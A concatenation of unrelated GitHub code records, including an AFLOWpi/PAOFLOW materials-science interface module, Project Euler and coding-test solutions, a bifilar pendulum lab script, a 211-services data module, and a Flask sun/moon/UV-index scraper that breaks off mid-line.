AFLOWpi.scfuj._add_paopy_xml(paopy_input,'non_ortho','logical','T')\n\ndef _add_paopy_dos(oneCalc,ID,fermi_surf=False):\n paopy_input = os.path.join(oneCalc['_AFLOWPI_FOLDER_'],'inputfile.xml')\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'do_dos','logical','T')\n if fermi_surf:\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'fermisurf','logical','T')\n\ndef _add_paopy_pdos(oneCalc,ID):\n paopy_input = os.path.join(oneCalc['_AFLOWPI_FOLDER_'],'inputfile.xml')\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'do_pdos','logical','T')\n\n \ndef _add_paopy_bands(oneCalc,ID,nk=1000,topology=True,ipol=0,jpol=1,spol=2):\n\n paopy_input = os.path.join(oneCalc['_AFLOWPI_FOLDER_'],'inputfile.xml')\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'do_bands','logical','T')\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'nk','int',nk)\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'ipol','int',ipol)\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'jpol','int',jpol)\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'spol','int',spol)\n if topology==True:\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'band_topology','logical','T')\n\n\n if oneCalc['_AFLOWPI_ORIG_IBRAV_']==0:\n HSP,band_path = AFLOWpi.retr._getHighSymPoints(oneCalc,ID)\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'band_path','character',band_path)\n temp_HSP_list=[]\n for k,v in list(HSP.items()):\n tmp = [k]\n tmp.extend(list(map(str,v)))\n 
temp_HSP_list.append(tmp)\n\n HSP_ARRAY= np.asarray(temp_HSP_list)\n\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'high_sym_points','string',HSP_ARRAY,degree=2)\n\n\ndef _add_paopy_transport(oneCalc,ID,t_tensor,t_min,t_max,t_step,carr_conc):\n paopy_input = os.path.join(oneCalc['_AFLOWPI_FOLDER_'],'inputfile.xml')\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'Boltzmann','logical','T')\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'tmin','decimal',t_min)\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'tmax','decimal',t_max)\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'tstep','decimal',t_step)\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'t_tensor','int',t_tensor,degree=2)\n if carr_conc:\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'carrier_conc','logical','T')\n\n\n\ndef _add_paopy_optical(oneCalc,ID,d_tensor):\n paopy_input = os.path.join(oneCalc['_AFLOWPI_FOLDER_'],'inputfile.xml')\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'epsilon','logical','T')\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'d_tensor','int',d_tensor,degree=2)\n \ndef _add_paopy_spin_Hall(oneCalc,ID,s_tensor,spin_texture=False):\n paopy_input = os.path.join(oneCalc['_AFLOWPI_FOLDER_'],'inputfile.xml')\n\n nl,sh = AFLOWpi.scfuj._get_spin_ordering(oneCalc,ID)\n\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'sh','int',sh,degree=1)\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'nl','int',nl,degree=1)\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'s_tensor','int',s_tensor,degree=2)\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'spin_Hall','logical','T')\n\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'eminSH','decimal',-5.0)\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'emaxSH','decimal',5.0)\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'ac_cond_spin','logical','T')\n\n if spin_texture:\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'spintexture','logical','T')\n\ndef _add_paopy_Berry(oneCalc,ID,a_tensor):\n paopy_input = os.path.join(oneCalc['_AFLOWPI_FOLDER_'],'inputfile.xml')\n\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'Berry','logical','T')\n\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'eminAH','decimal',-5.0)\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'emaxAH','decimal',5.0)\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'ac_cond_Berry','logical','T')\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'a_tensor','int',a_tensor,degree=2)\n\n\ndef _mult_kgrid(oneCalc,mult=5.0):\n\n inputDict=AFLOWpi.retr._splitInput(oneCalc['_AFLOWPI_INPUT_'])\n kpt_str = inputDict['K_POINTS']['__content__'] \n try:\n mult[0]\n tmp_kps = kpt_str.split()[:3]\n k_grid = [int(np.ceil(float(tmp_kps[x])*mult[x])) for x in range(len(tmp_kps))]\n except:\n k_grid = [int(np.ceil(float(x)*mult)) for x in kpt_str.split()[:3]]\n\n return k_grid[0],k_grid[1],k_grid[2]\n \ndef _rename_boltz_files(oneCalc,ID):\n nspin = AFLOWpi.scfuj.chkSpinCalc(oneCalc,ID=ID)\n\n \n try:\n test_file = os.path.join(oneCalc['_AFLOWPI_FOLDER_'],'Seebeck_0.dat')\n test_dat = np.loadtxt(test_file)\n temp = np.unique(test_dat[:,0])\n except Exception as e: \n return\n \n for T in range(temp.shape[0]):\n conv_dict={}\n if nspin!=1:\n conv_dict['Seebeck_0.dat'] = '%s_PAOFLOW_seebeck_up_%sK.dat'%(ID,int(temp[T])) \n conv_dict['sigma_0.dat'] = '%s_PAOFLOW_cond_up_%sK.dat'%(ID,int(temp[T])) \n conv_dict['kappa_0.dat'] = '%s_PAOFLOW_kappa_up_%sK.dat'%(ID,int(temp[T])) \n conv_dict['epsr_0.dat'] = '%s_PAOFLOW_epsilon_up_real.dat'%ID \n conv_dict['epsi_0.dat'] = '%s_PAOFLOW_epsilon_up_imag.dat'%ID \n\n conv_dict['Seebeck_1.dat'] = '%s_PAOFLOW_seebeck_down_%sK.dat'%(ID,int(temp[T])) \n conv_dict['sigma_1.dat'] = 
'%s_PAOFLOW_cond_down_%sK.dat'%(ID,int(temp[T])) \n conv_dict['kappa_1.dat'] = '%s_PAOFLOW_kappa_down_%sK.dat'%(ID,int(temp[T])) \n conv_dict['epsr_1.dat'] = '%s_PAOFLOW_epsilon_down_real.dat'%ID \n conv_dict['epsi_1.dat'] = '%s_PAOFLOW_epsilon_down_imag.dat'%ID \n else:\n conv_dict['Seebeck_0.dat'] = '%s_PAOFLOW_seebeck_%sK.dat'%(ID,int(temp[T])) \n conv_dict['sigma_0.dat'] = '%s_PAOFLOW_cond_%sK.dat'%(ID,int(temp[T])) \n conv_dict['kappa_0.dat'] = '%s_PAOFLOW_kappa_%sK.dat'%(ID,int(temp[T])) \n conv_dict['epsr_0.dat'] = '%s_PAOFLOW_epsilon_real.dat'%ID \n conv_dict['epsi_0.dat'] = '%s_PAOFLOW_epsilon_imag.dat'%ID \n\n for old,new in list(conv_dict.items()):\n old_split = old.split('_')\n try:\n xx = os.path.join(oneCalc['_AFLOWPI_FOLDER_'],old_split[0]+'_xx_'+old_split[1])\n yy = os.path.join(oneCalc['_AFLOWPI_FOLDER_'],old_split[0]+'_yy_'+old_split[1])\n zz = os.path.join(oneCalc['_AFLOWPI_FOLDER_'],old_split[0]+'_zz_'+old_split[1])\n \n xx_arr = np.loadtxt(xx)\n yy_arr = np.loadtxt(yy)\n zz_arr = np.loadtxt(zz)\n\n comb_arr = np.concatenate((xx_arr[:,np.newaxis,0],xx_arr[:,np.newaxis,1],\n yy_arr[:,np.newaxis,1],zz_arr[:,np.newaxis,1] ),axis=1)\n new_path = os.path.join(oneCalc['_AFLOWPI_FOLDER_'],new)\n\n np.savetxt(new_path,comb_arr)\n\n except Exception as e: \n try:\n dat = np.loadtxt(old)\n temp_dat = dat[np.where(dat[:,0]==temp[T])]\n np.savetxt(new,temp_dat[:,1:])\n except:\n pass\n\n\n\n\ndef _get_spin_ordering(oneCalc,ID):\n in_str = AFLOWpi.retr._getOutputString(oneCalc,ID+'_pdos')\n\n rename_info_re = re.compile(r'state #\\s*(\\d*): atom\\s*(\\d+)\\s*\\(\\s*(\\S*)\\s*\\).*wfc\\s*(\\d+).*l=(\\d+).*m_j=([\\s-][.\\d]+).*\\n')\n\n res = rename_info_re.findall(in_str)\n\n l_list= []\n for i in res:\n l_list.append([int(i[1]),int(i[4])])\n\n grouped_l = [list(g) for k, g in itertools.groupby(l_list)] \n sh = []\n nl = []\n print(grouped_l)\n for i in range(len(grouped_l)):\n sh.append(grouped_l[i][0][1])\n if grouped_l[i][0][1]==0:\n nl.append(len(grouped_l[i])/2)\n if grouped_l[i][0][1]==1:\n nl.append(len(grouped_l[i])/6)\n if grouped_l[i][0][1]==2:\n nl.append(len(grouped_l[i])/10)\n if grouped_l[i][0][1]==3:\n nl.append(len(grouped_l[i])/14)\n\n return nl,sh\n\n\ndef _rename_hall_files(oneCalc,ID):\n dirn = oneCalc[\"_AFLOWPI_FOLDER_\"]\n hall_files = [\"ahcEf_xy.dat\",\"MCDi_xy.dat\",\"MCDr_xy.dat\",\n \"SCDi_z_xy.dat\",\"SCDr_z_xy.dat\",\"shcEf_z_xy.dat\",]\n\n for fn in hall_files:\n old=os.path.join(dirn,fn)\n new=os.path.join(dirn,\"%s_%s\"%(ID,fn))\n try:\n os.rename(old,new)\n except: pass\n\n\n\n\ndef _rename_bands_files(oneCalc,ID):\n '''\n\n\n Arguments:\n\n\n Keyword Arguments:\n\n \n Returns:\n\n\n '''\n try:\n try:\n want_stdout_path = glob.glob(oneCalc['_AFLOWPI_FOLDER_']+'/kpath_points.txt')[-1]\n except:\n want_stdout_path = glob.glob(oneCalc['_AFLOWPI_FOLDER_']+'/%s_kpath_points.txt'%ID)[-1]\n\n with open(want_stdout_path,\"r\") as ofo:\n lines=ofo.readlines()\n\n output_path_string=\"\"\n flag=False\n points_list=[]\n for l in lines:\n if len(l.strip())==0:\n flag=True\n if flag==False:\n lspl=l.split()\n output_path_string+=\"0.0 0.0 0.0 %s ! 
%s\\n\"%(lspl[1],lspl[0])\n else:\n points_list.extend([float(x) for x in l.split()])\n\n points=np.reshape(np.asarray(points_list),(int(len(points_list)/3.0),3))\n\n r = np.diff(points,axis=0)\n\n dist=np.cumsum(np.sqrt(np.sum(r**2,axis=1)))\n dist = np.concatenate((np.array([0.0]),dist),axis=0)\n except: pass\n calcID = AFLOWpi.prep._return_ID(oneCalc,ID,step_type='PAO-TB',last=True)\n\n\n si= AFLOWpi.retr._splitInput(oneCalc[\"_AFLOWPI_INPUT_\"])\n try:\n nspin=int(si[\"&system\"][\"nspin\"]) \n except Exception as e: \n nspin=1\n\n\n\n if nspin==2:\n try:\n with open(\"bands_1.dat\",\"r\") as ofo:\n by_band = np.array([list(map(float,x.split())) for x in ofo.readlines()]).T\n ofs=\"\"\n for band in range(by_band.shape[0]):\n for kpt in range(by_band.shape[1]):\n ofs+=\"%s %s\\n\"%(dist[kpt],by_band[band,kpt])\n if band!=by_band.shape[0]-1:\n ofs+=\"\\n\"\n\n filebands = os.path.join(oneCalc[\"_AFLOWPI_FOLDER_\"],'%s_bands_paopy_down_cleaned.dat'%calcID)\n with open(filebands,\"w\") as ofo:\n ofo.write(ofs)\n except Exception as e: print(e)\n\n\n\n if nspin==2:\n filebands = os.path.join(oneCalc[\"_AFLOWPI_FOLDER_\"],'%s_bands_paopy_up_cleaned.dat'%calcID)\n else:\n filebands = os.path.join(oneCalc[\"_AFLOWPI_FOLDER_\"],'%s_bands_paopy_cleaned.dat'%calcID)\n\n with open(os.path.join(oneCalc[\"_AFLOWPI_FOLDER_\"],\"bands_0.dat\"),\"r\") as ofo:\n by_band = np.array([list(map(float,x.split())) for x in ofo.readlines()]).T\n\n try:\n ofs=\"\"\n for band in range(1,by_band.shape[0]):\n for kpt in range(by_band.shape[1]):\n ofs+=\"%s %s\\n\"%(dist[kpt],by_band[band,kpt])\n if band!=by_band.shape[0]-1:\n ofs+=\"\\n\" \n\n with open(filebands,\"w\") as ofo:\n ofo.write(ofs)\n except Exception as e:\n AFLOWpi.run._fancy_error_log(e)\n raise SystemExit\n pass\n \n nfm = os.path.join(oneCalc['_AFLOWPI_FOLDER_'],'%s_kpath_points.txt'%ID)\n try:\n os.rename(want_stdout_path,nfm)\n except: pass\n","repo_name":"marcofornari/AFLOWpi","sub_path":"src/scfuj/src/paopy_interface.py","file_name":"paopy_interface.py","file_ext":"py","file_size_in_byte":19665,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"56"} +{"seq_id":"31844102988","text":"import timeit\nimport math\n\ndef v34_1():\n sum_of_all=0\n upper_limit=math.factorial(9)*7\n #because 9!8 -> is also a 7 digit number\n for x in range(3,upper_limit):\n sum_factorial=0\n for a in str(x):\n sum_factorial+=math.factorial(int(a))\n if (sum_factorial==x):\n sum_of_all+=x\n return sum_of_all \n\n#print(v34_1())--> Answer 40730\nprint(timeit.timeit(v34_1,number=10)/10)\n#5.940520286599996sec","repo_name":"SebNik/Project-Euler","sub_path":"34_1.py","file_name":"34_1.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"10725841039","text":"T = int(input())\n\nfor tc in range(1, T+1):\n case = int(input())\n grade = list(map(int, input().split()))\n arr = [0] * 101\n for i in grade:\n arr[i] += 1\n mx = 0\n for i in range(101):\n if arr[mx] <= arr[i]:\n mx = i\n\n print(\"#{} {}\".format(tc, mx))\n # print(target)","repo_name":"tykimdream/algorithm","sub_path":"ssafy-coding-test/SWEA/D2/1204.py","file_name":"1204.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"23073296185","text":"#-----------------------------------------------------------------\n# Import Required 
Packages\n#-----------------------------------------------------------------\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom statistics import mean\nfrom scipy.signal import find_peaks\nimport math\n\n\n#-----------------------------------------------------------------\n#-----------------------------------------------------------------\n# When reading from your own data:\n# --> Go to File and Open \n# --> Open CSV file in Python and rename first row variables: Time,omegax,omegay,omegaz,omegaa\n# --> Then save and close the CSV file\n#-----------------------------------------------------------------\n#-----------------------------------------------------------------\nfilename = 'raw_data.csv' # Update filename with your own data file\n\n\n#-----------------------------------------------------------------\n# Bifilar Pendulum variables\n# Fill in Bifilar and phone dimensions\n# Based on Ogata PDF variable names\n#-----------------------------------------------------------------\nh = 0.7112 # [m], bifilar string length\na = 0.0445 # [m], length between files/2\nL = 0.1447 # [m], length of phone (horizontal --> parallel to ground)\nt = 0.008 # [m], thickness of phone\nm = 0.151 # [kg], phone mass\n\n#-----------------------------------------------------------------\n# Read CSV file and index the columns using the renamed column header names\n#-----------------------------------------------------------------\ncsvdata = pd.read_csv(filename)\n\nT = csvdata.Time\nwx = csvdata.omegax\nwy = csvdata.omegay\nwz = csvdata.omegaz\n \n#-----------------------------------------------------------------\n# Plot raw data: wx, wy, and wz versus Time [s]\n# --> Use this to find the time values where your oscillation begins/ends\n#----------------------------------------------------------------- \nplt.figure(1)\nplt.plot(T, wx)\nplt.plot(T, wy)\nplt.plot(T, wz)\nplt.xlabel(\"Time (s)\")\nplt.ylabel(\"Angular Velocity (rad/s)\")\nplt.legend([\"wx\", \"wy\", \"wz\"])\nplt.title(\"Angular Velocity vs Time\")\nplt.grid()\nplt.show()\n\n#-----------------------------------------------------------------\n# Analyze a subset of the data\n# --> it1 is the time index right before the oscillation begins\n# --> it1 is the time index where the oscillation ends\n# --> Example: I wanted to analyze a signal from T = 6 - 60 seconds\n# so I found the T[it1] value that was close to 6 s\n# and the T[it2] value that was close to 60 s\n#-----------------------------------------------------------------\n\nit1,it2 = 6800,21088 # Update these iteration values for your own data\nTpend = T[it1:it2]\nwxpend = wx[it1:it2]\n\n\n#-----------------------------------------------------------------\n#-----------------------------------------------------------------\n# Find the peaks of the subset\n# This section should work without any code updates\n# **Only update the distance value here if peaks are not matching**\n# --> Larger distance integer value forces more points between peaks\n#-----------------------------------------------------------------\n#-----------------------------------------------------------------\nwx_its, _ = find_peaks(list(wxpend),height=0,distance = 50) # solves for peak iteration values\nwx_its = wx_its+it1 # Shifts iteration values by it1\nwx_peaks = wxpend[wx_its] # Solves for peak values using wx_its iteration values\nTx_peaks = Tpend[wx_its] # Solves for time peak values occur using wx_its iteration values\n\n#-----------------------------------------------------------------\n# Calculate Average 
Period\n# **This section does not require updating**\n#\n# For loop is used to calculate time between peaks\n# Mean function is used to calculate average period\n#-----------------------------------------------------------------\nTperiod = []\nfor i in range(len(wx_peaks)):\n if(i>0):\n Tperiod.append(Tx_peaks[wx_its[i]] - Tx_peaks[wx_its[i-1]])\n\nTp_avg = mean(Tperiod)\nprint(\"T Avg [s] =\",Tp_avg)\n\n#-----------------------------------------------------------------\n# Solve for J values\n# Theoretical (th) uses only phone mass and dimensions\n# Experimental (exp) uses measured period, phone mass, and filar dimensions\n#-----------------------------------------------------------------\nJth = 1/12*m*(t**2 + L**2)\nJexp = (Tp_avg/2/math.pi)**2*m*9.81*(a)**2/h\n\n# Print functions do not require updates\nprint(\"J experimental [kg*m^2] = % 5.6f\" %(Jexp))\nprint(\"J theoretical [kg*m^2] = % 5.6f\" %(Jth))\n\n#-----------------------------------------------------------------\n# Plot oscillation and peak data\n# --> Plot Tpend and wxpend data\n# --> Scatter plot Tx_peaks and wx_peaks with red x markers\n#-----------------------------------------------------------------\nplt.figure(2)\nplt.plot(Tpend, wxpend)\nplt.scatter(Tx_peaks, wx_peaks, marker='x', color = 'r')\nplt.xlabel(\"Time (s)\")\nplt.ylabel(\"Angular Velocity (rad/s)\")\nplt.title(\"Angular Velocity vs Time\")\nplt.legend([\"All data\", \"Peak data\"])\nplt.grid()\nplt.show()","repo_name":"kierancoz/dyn_sys_controls","sub_path":"lab2/Bifilar_Pendulum_Student_File.py","file_name":"Bifilar_Pendulum_Student_File.py","file_ext":"py","file_size_in_byte":5027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"29508978608","text":"import math\ndef solution(n, k):\n \n # 1 2 3\n # 1 3 2\n # 2 1 3\n # 2 3 1\n # 3 1 2\n # 3 2 1\n \n # n 명에게 번호를 붙여 리스트 업\n people = [i for i in range(1, n + 1)]\n result = [] \n \n while n:\n # n명일때 줄을 서는 방법은 n!(factorial)에 해당 하고 이걸 n명으로 나누면 한명이 맨앞에 나왔을때의 가지 ���가 된다.\n one_case = math.factorial(n) // n\n # 전체 경우 수 중에서 k번째니까 k를 한명의 경우의 수로 나누면 k번째가 몇번째 사람인지 알수있다.\n people_num = k // one_case\n # k를 한명의 경우의 수로 나눈 나머지는 위에서 알게된 몇번째 사람의 몇번째 경우의 수인지 알수있다.\n k %= one_case \n \n if k == 0: result.append(people.pop(people_num - 1)) # 나머지가 0인 경우는 해당 번째 이전 사람의 마지막 경우이므로 전사람을 배치\n else: result.append(people.pop(people_num)) # 해당 번째 사람 배치\n \n n -= 1 # 한명은 자리를 잡았으니 다음 번에 이 사람을 제외하고 자리잡도록 한명 제외\n \n return result","repo_name":"littlezero48/Study-algorithm","sub_path":"프로그래머스/lv2/12936. 
줄 서는 방법/줄 서는 방법.py","file_name":"줄 서는 방법.py","file_ext":"py","file_size_in_byte":1223,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"3867992831","text":"import libraries_used as lu\nimport read_csv_data as rcd\n\n#--------Census Data Dropdown Prepare------------------------------------------------------------------\n# census_data_df = lu.pd.read_csv('Data/census_2015_data.csv')\n# census_data_columns = list(census_data_df.columns.values)\ncensus_data_columns = list(rcd.census_2015_data.columns.values)\ncensus_del_data = ['GEOID','year','name','parent_location']\n\ncensus_data_columns = [i for i in census_data_columns if i not in census_del_data]\nfor i in range(0, len(census_data_columns)):\n if 'pct' in census_data_columns[i]:\n x, y = census_data_columns[i].split(\"pct_\")\n census_data_columns[i] = \"% of \"+ y\n # census_data_columns[i] = census_data_columns[i].replace(\"_\", \" \")\n if '_' in census_data_columns[i]:\n census_data_columns[i] = census_data_columns[i].replace(\"_\", \" \")\n\n#-------------------------------------------------------------------------------------------------------\n\n\n#--------Slider Prepare----------------------------------------------------------------\nyears = [2015, 2016, 2017, 2018]\n#--------------------------------------------------------------------------------------\n\n\n#---------------------------------Counties Mapping------------------------------------------\nwith lu.urlopen('https://raw.githubusercontent.com/plotly/datasets/master/geojson-counties-fips.json') as response:\n counties = lu.json.load(response)\n\n\n\n#---------------------------------Zip Code Mapping------------------------------------------\n# # with open('C://Users//Akshay//Desktop//Masters Project//S_SQUARE_LAB//Data//New_York.topo.json') as response1:\n# # zipcodes = lu.json.load(response1)\n#\n# zipcodes_data_df = lu.pd.read_csv('Data/New_York_State_ZIP_Codes-County_FIPS_Cross-Reference.csv')\n#----------------------------------------------------------------------------------------------------\n\n#--------------------Map Level----------------------------------------------------------\nmap_level = ['Auto', 'Counties', 'Zip Code']\n# #---------------------------------------------------------------------------------------\n\n#----------------------------------------------------------------------------------------------------\n\n# livability_index_data = lu.pd.read_csv('Data/liviability_index_data.csv')\n# zipcode_livability_index_data = lu.pd.read_csv('Data/ny_zip_code_livability_details.csv')\n\n#------------------------------------------------------------------------------------------------------\ndata_211_categories = {'B':'Basic Needs','D':\"Consumer Services\",'F':'Criminal Justice and Legal Services',\n 'H': 'Education', 'J': 'Environment and Public Health/Safety', 'L': 'Health Care',\n 'N': 'Income Support and Employment', 'P': 'Individual and Family Life',\n 'R': 'Mental Health and Substance Use', 'T': 'Organizational/Community/International Services',\n 'Y': 'Target Populations' }\n\ndata_211_categories_num = {'B': 1, 'D': 2, 'F': 3,\n 'H': 4, 'J': 5, 'L': 6,\n 'N': 7, 'P': 8, 'R': 9,\n 'T': 10,'X':11, 'Y': 12}\n\n\ndata_211_sub_categories = {'B': ['BD', 'BH', 'BM', 'BT', 'BV'],\n 'D': ['DD', 'DF', 'DM', 'DT'],\n 'F': ['FC', 'FF', 'FJ', 'FL', 'FN', 'FP', 'FR', 'FT'],\n 'H': ['HD', 'HH', 'HL'],\n 'J': ['JP', 'JR'],\n 'L': ['LD', 'LE', 'LF', 'LH', 'LJ', 'LL', 'LN', 'LR', 'LT', 'LV'],\n 'N': ['ND', 'NL', 
'NS', 'NT'],\n 'P': ['PB', 'PD', 'PH', 'PL', 'PN', 'PS', 'PW', 'PX'],\n 'R': ['RF', 'RM', 'RP', 'RR', 'RX'],\n 'T': ['TB', 'TC', 'TD', 'TE', 'TH', 'TI', 'TJ', 'TM', 'TN', 'TO', 'TP'],\n 'Y': ['YB', 'YC', 'YF', 'YJ', 'YK', 'YL', 'YM', 'YN', 'YO', 'YP', 'YS', 'YT', 'YV', 'YX', 'YZ']}\n\n\ndata_211_sub_categories_text = {'B': ['Food','Housing/Shelter','Material Goods','Transportation','Utilities'],\n 'D': ['Consumer Assistance and Protection','Consumer Regulation','Money Management',\n 'Tax Organizations and Services'],\n 'F': ['Courts','Criminal Correctional System','Judicial Services','Law Enforcement Agencies',\n 'Law Enforcement Services','Legal Assistance Modalities','Legal Expense Insurance','Legal Services'],\n 'H': ['Educational Institutions/Schools','Educational Programs','Educational Support Services'],\n 'J': ['Environmental Protection and Improvement','Public Health','Public Safety'],\n 'L': ['Emergency Medical Care','General Medical Care','Health Screening/Diagnostic Services',\n 'Health Supportive Services','Human Reproduction','Inpatient Health Facilities',\n 'Outpatient Health Facilities','Rehabilitation/Habilitation Services',\n 'Specialized Treatment and Prevention','Specialty Medicine'],\n 'N': ['Employment','Public Assistance Programs','Social Insurance Programs','Temporary Financial Assistance'],\n 'P': ['Death Certification/Burial Arrangements','Domestic Animal Services','Individual and Family Support Services',\n 'Leisure Activities/Recreation','Mutual Support','Social Development and Enrichment',\n 'Volunteer Development','Volunteer Opportunities'],\n 'R': ['Counseling Settings','Mental Health Care Facilities',\n 'Mental Health Assessment and Treatment','Mental Health Support Services',\n 'Substance Use Disorder Services'],\n 'T': ['Community Economic Development and Finance','Community Facilities/Centers','Community Groups and Government/Administrative Offices',\n 'Community Planning and Public Works','Disaster Services','Donor Services','Information Services','Military Service',\n 'Occupational/Professional Associations','Organizational Development and Management Delivery Methods',\n 'Organizational Development and Management Services'],\n 'Y': ['Age Groups','Benefits Recipients','Disabilities and Health Conditions','Families and Individuals Needing Support',\n 'Family Relationships','Income/Employment Status', 'Living Situation/Housing Status','Military Personnel/Contractors',\n 'Occupations','Offenders','Sex/Gender','Sexual Orientation/Gender Identity','Transients',\n 'Victims/Survivors','Topical Identifiers/Issues']}\n\n#------------------------------------------------------------------------------------------------------\n#------------------------------------------------------------------------------------------------------\ndata_211_categories_l = list(data_211_categories.values())\nkey_list = list(data_211_categories.keys())\nval_list = list(data_211_categories.values())\n\n","repo_name":"akshaygujjari/S_SQUARE_LAB","sub_path":"read_data.py","file_name":"read_data.py","file_ext":"py","file_size_in_byte":7339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"10600191140","text":"from flask import Flask, render_template, redirect, url_for, request, Blueprint\nimport bs4\nimport requests\nfrom datetime import datetime\nfrom astral import LocationInfo\nfrom datetime import *\nfrom astral.sun import sun\nfrom astral import moon\n\n### SUN/MOON Data #########\nmoon_phase = moon.phase(datetime.today())\ndef 
moonphase():\n if moon_phase >= 0 and moon_phase < 1.1:\n return('New Moon')\n if moon_phase >= 1.1 and moon_phase < 6.38:\n return('Waxing Crescent')\n if moon_phase >= 6.38 and moon_phase < 8.38:\n return('First Quarter')\n if moon_phase >= 8.38 and moon_phase < 13.76:\n return('Waxing Gibbous')\n if moon_phase >= 13.76 and moon_phase < 15.77:\n return('Full Moon')\n if moon_phase >= 15.77 and moon_phase < 21.14:\n return('Waning Gibbous')\n if moon_phase >= 21.14 and moon_phase < 23.14:\n return('Last Quarter')\n if moon_phase >= 23.14 and moon_phase < 28.53:\n return('Waning Crescent')\n if moon_phase >= 28.53 and moon_phase < 29.54:\n return('New Moon')\n\nmoon = (moonphase())\ntday = datetime.today()\n\ndef sr_ss(city, lat, long):\n city = LocationInfo(city, \"USA\", \"US/Hawaii\", lat, long)\n\n s = sun(city.observer, date=tday, tzinfo=city.timezone)\n\n dawn = (f'{s[\"dawn\"]}')\n sunrise = (f'{s[\"sunrise\"]}')\n sunset = (f'{s[\"sunset\"]}')\n dusk = (f'{s[\"dusk\"]}')\n\n dawn_clean = dawn.split('.')[0].replace('-', '/')\n sunrise_clean = sunrise.split('.')[0].replace('-', '/')\n sunset_clean = sunset.split('.')[0].replace('-', '/')\n dusk_clean = dusk.split('.')[0].replace('-', '/')\n\n dawn = datetime.strptime(dawn_clean, \"%Y/%m/%d %H:%M:%S\")\n dawn_strf = dawn.strftime(\"%I:%M %p\")\n\n sunrise = datetime.strptime(sunrise_clean, \"%Y/%m/%d %H:%M:%S\")\n sunrise_strf = sunrise.strftime(\"%I:%M %p\")\n\n sunset = datetime.strptime(sunset_clean, \"%Y/%m/%d %H:%M:%S\")\n sunset_strf = sunset.strftime(\"%I:%M %p\")\n\n dusk = datetime.strptime(dusk_clean, \"%Y/%m/%d %H:%M:%S\")\n dusk_strf = dusk.strftime(\"%I:%M %p\")\n\n return(dawn_strf, sunrise_strf, sunset_strf, dusk_strf)\n\nhnl_sr_ss = sr_ss(\"Honolulu\", 21.315603, -157.858093)\nhnl_dawn = hnl_sr_ss[0]\nhnl_sr = hnl_sr_ss[1]\nhnl_ss = hnl_sr_ss[2]\nhnl_dusk = hnl_sr_ss[3]\n\n\nnow = datetime.now()\ncurrent_time = now.strftime(\"%H:%M:%S\")\n\nif int(now.strftime(\"%H\")) >= 23 or int(now.strftime(\"%H\")) < 2:\n curr_time = \"11pm\"\nif int(now.strftime(\"%H\")) >= 2 and int(now.strftime(\"%H\")) < 5:\n curr_time = \"2am\"\nif int(now.strftime(\"%H\")) >= 5 and int(now.strftime(\"%H\")) < 8:\n curr_time = \"5am\"\nif int(now.strftime(\"%H\")) >= 8 and int(now.strftime(\"%H\")) < 11:\n curr_time = \"8am\"\nif int(now.strftime(\"%H\")) >= 11 and int(now.strftime(\"%H\")) < 14:\n curr_time = \"11am\"\nif int(now.strftime(\"%H\")) >= 14 and int(now.strftime(\"%H\")) < 17:\n curr_time = \"2pm\"\nif int(now.strftime(\"%H\")) >= 17 and int(now.strftime(\"%H\")) < 20:\n curr_time = \"5pm\"\nif int(now.strftime(\"%H\")) >= 20 and int(now.strftime(\"%H\")) < 23:\n curr_time = \"8pm\"\n\n######################### UV Index\nres = requests.get('https://forecast.weather.gov/product.php?site=CRH&product=UVI&issuedby=CAC')\nres.raise_for_status()\nbs4.BeautifulSoup(res.text, features='lxml')\n\nsoup = bs4.BeautifulSoup(res.text, features='lxml')\nsoup.find('#local > pre')\n\nuvi1 = soup.select('#local > pre')\n\nuvi2 = uvi1[0]\nuvi3 = str(uvi2)\nuvi4 = uvi3[0:-1]\n\nuvi5 = uvi4.index('HONOLULU')\nuvi6 = uvi4.index('SEATTLE')\n\nuvi7 = int(uvi5)\nuvi8 = int(uvi6)\n\ncity = uvi3[uvi7:uvi7 + 8]\nindexnum = int(uvi3[uvi6 - 10:uvi6])\nindexnumstring = (uvi3[uvi6 - 10:uvi6])\n\nif indexnum in range(0, 3):\n explvl = \"Low\"\nif indexnum in range(3, 6):\n explvl = \"Moderate\"\nif indexnum in range(6, 8):\n explvl = \"High\"\nif indexnum in range(8, 11):\n explvl = \"Very 